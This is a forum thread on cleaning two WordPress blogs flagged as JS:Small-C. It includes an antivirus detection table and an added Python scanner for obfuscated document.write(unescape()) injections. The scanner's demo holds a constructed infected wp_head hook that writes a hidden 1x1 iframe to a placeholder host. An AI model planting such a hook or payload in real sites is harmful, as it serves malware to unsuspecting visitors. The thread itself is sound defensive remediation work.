JS:Small-C in WP blogs... NEED HELP!

Hi,

I get Avast warnings about JS:Small-C on two WordPress blogs I set up for someone else, on which, of course, they have not updated the WP version in almost a year. I am trying to help them solve the issue.

In a previous thread on this topic, Mentalist suggested a way to delete the malicious code, but I could not make it work.

I went into the header.php folders both via C-Panel/File Manager AND with my FTP client (I use Core FTP Lite)…

I found the following code, as suggested by mentalist:

<?php wp_head(); ?>

However, I cannot find ANY indication of the malicious code, whether I access via FTP or C-panel:

document.write(unescape('%3C%7 --- and etc

Help! FYI, both blogs use a custom template created with Artisteer, if that is relevant.

The blog sites are at:
hxxp://drpeelittle.com
hxxp://dancingfrogranch.com

Any suggestions MUCH appreciated!

Malcolm

Disable the links in your post by replacing http with hxxp.

This would appear to be a hacked site as a result of an exploit of a vulnerability in old versions of WordPress. Ensure that you have the latest version of any content management software. It also looks like the favicon.ico file and possibly any custom 404 error page may have been hacked.

The obfuscated script you mention is almost certainly what is being alerted on.

avast isn’t alone in finding the index page of drpeelittle.com infected, http://www.virustotal.com/analisis/51035db5916e6d01f696de63b88f9d5a2f27edb6f1e63f71304cc7d7cc30f255-1270436225.

In both your cases the obfuscated script in the HTML page transferred to the end user is located immediately between the tags and . So it is worth checking the code that generates both the and sections.
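As an added example for the advice above (not code from this thread or from any of the posters), here is a small Python scanner that walks a WordPress tree, reports every document.write(unescape('...')) it finds in theme and plugin source, decodes the payload the way a browser's unescape() would (including %uXXXX, which plain URL decoders miss) so the hidden tag becomes readable, and records the file's SHA1 so a hit can be matched against a scan report's hash. The directory layout, the wp_head hook in functions.php and the example.invalid payload are constructed for the demo and are not taken from the affected sites.

```python
"""Scan a WordPress tree for document.write(unescape('...')) injections.

Added example for this thread, not code posted by any participant.
The sample files and payload under demo() are constructed.
"""
import hashlib
import os
import re
import tempfile

# The injection idiom discussed in the thread: document.write(unescape('%3C...')).
# Either quote style is accepted and whitespace inside the call is tolerated.
WRITE_UNESCAPE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(?P<payload>.*?)\1\s*\)\s*\)",
    re.DOTALL,
)

# JavaScript's unescape() understands both %XX and %uXXXX; URL decoders only
# handle %XX, so decode by hand to see exactly what the browser will write.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def js_unescape(s):
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

INJECTED_TAGS = ("<iframe", "<script", "<object", "<embed")

def find_injections(source):
    """Return [(line_no, decoded_payload), ...] for each match in one file's text."""
    return [
        (source.count("\n", 0, m.start()) + 1, js_unescape(m.group("payload")))
        for m in WRITE_UNESCAPE.finditer(source)
    ]

SCAN_EXT = {".php", ".js", ".html", ".htm"}

def scan_tree(root):
    """Walk root, scan theme/plugin source files, return one finding per hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read()
            text = raw.decode("utf-8", errors="replace")
            for line_no, decoded in find_injections(text):
                findings.append({
                    "file": os.path.relpath(path, root).replace(os.sep, "/"),
                    "line": line_no,
                    "decoded": decoded,
                    "injects_tag": any(t in decoded.lower() for t in INJECTED_TAGS),
                    # SHA1 of the whole file, to compare against a scan report's hash
                    "sha1": hashlib.sha1(raw).hexdigest(),
                })
    return findings

# --- constructed demo data -------------------------------------------------

CLEAN_HEADER = "<head>\n<?php wp_head(); ?>\n</head>\n<body>\n"

# Percent-encoded 1x1 iframe pointing at a placeholder host (example.invalid).
PAYLOAD = (
    "%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fin.php%22"
    "%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E"
)

# The injection rides on a wp_head hook, so header.php itself looks untouched,
# which is the situation the original poster describes.
INFECTED_FUNCTIONS = "\n".join([
    "<?php",
    "// constructed sample of an injected hook",
    "function theme_setup_extra() {",
    "    echo \"<script>document.write(unescape('" + PAYLOAD + "'));</script>\";",
    "}",
    "add_action('wp_head', 'theme_setup_extra');",
    "",
])

def demo():
    """Build a throwaway theme directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "custom")
        os.makedirs(theme)
        with open(os.path.join(theme, "header.php"), "w") as fh:
            fh.write(CLEAN_HEADER)
        with open(os.path.join(theme, "functions.php"), "w") as fh:
            fh.write(INFECTED_FUNCTIONS)
        return scan_tree(root)

if __name__ == "__main__":
    for f in demo():
        print(f["file"], "line", f["line"], "->", f["decoded"])
```

Run it against the web root (scan_tree("/path/to/wordpress")) rather than header.php alone: in the constructed case the clean header.php is what the poster saw, and the script only appears because a hook in functions.php prints it during wp_head(). A file scan still will not catch content stored in the database (widgets, options, posts), so a clean result from this tool does not on its own clear the site.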

Hi malcolm12,

The second site has this:
File information
Report date: 2010-04-05 20:25:17 (GMT 1)
File name: index
File size: 26536 bytes
MD5 hash: 9bc9899b462a9d1520269784b33289dd
SHA1 hash: d0c4ab5b9adf07e9f7c2b328ab679f6660244286
Detection rate: 10 on 21 (48%)
Status: INFECTED

Antivirus      Database      Engine         Result
a-squared      05/04/2010    4.5.0.8        Trojan-Clicker.JS.Agent!IK
Avast          100331-1      4.8.1368       JS:Small-C [Trj]
AVG            271.1.1/2792  9.0.0.725      JS/Downloader.Agent
Avira AntiVir  7.10.6.24     7.6.0.59       JS/Crypt.o
BitDefender    05/04/2010    7.0.0.2555     Trojan.JS.Iframe.AED
ClamAV         28/03/2010    0.95.3         -
Comodo         3468          3.13.579       -
Dr.Web         05/04/2010    5.0            VBS.Psyme.377
Ewido          05/04/2010    -              -
F-PROT6        20100405      6.3.3.4884     -
G-Data         19.9309       2.0.7309.847   JS:Small-C [Trj] B
Ikarus T3      05/04/2010    1001074        Trojan-Clicker.JS.Agent
Kaspersky      05/04/2010    9.0.0.736      Trojan-Clicker.JS.Agent.ma
McAfee         31/03/2010    5.1.0.0        JS/Wonka trojan
NOD32          5002          4.0.474        -
Panda          05/04/2010    9.5.2          -
Solo           05/04/2010    8.0            -
TrendMicro     939           9.120-1004     -
VBA32          05/04/2010    3.12.12.2      -
VirusBuster    12.23.14.0    1.5.5.0        -
Zoner          05/04/2010    0.2

The obfuscated inline script found is shown in the attached screendump of the XSS exploit, because of weak PHP.

polonus